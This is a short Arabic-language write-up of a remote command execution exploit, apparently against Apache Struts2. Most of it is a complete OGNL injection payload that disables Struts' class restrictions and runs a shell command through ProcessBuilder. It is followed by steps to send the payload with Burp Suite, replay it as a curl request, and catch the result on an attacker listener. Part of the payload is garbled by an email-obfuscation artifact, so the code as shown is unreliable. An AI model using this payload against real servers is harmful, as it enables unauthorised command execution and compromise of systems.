
مشروع RCE
هجوم تنفيذ الأوامر عن بُعد (RCE) ممكن باستخدام الحمولة المعطاة.
يسرد ما يلي البيئات والأدوات المستخدمة للاختبار والتحقق في مختبر شخصي معزول.
باستخدام الأمر التالي:
docker compose up -d
يمكنك تشغيل البيئة. بعد ذلك يمكنك رؤية صفحة إرسال من خلال زيارة http://<YOUR_IP>:8080/hello.action.
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
من أجل تنفيذ هجوم RCE، من الضروري استخدام Burp Suite. أثناء استخدام Burp Suite، قم بإرسال الحمولة. بعد إرسال الحمولة، ابحث عن السجل الصحيح (POST) وحوّله إلى أمر curl. أخيرًا، افتح جهاز المهاجم واستمع على المنفذ بعد إرسال أمر curl من منفذ المستمع.
المناطق المحجوبة هي عناوين IP.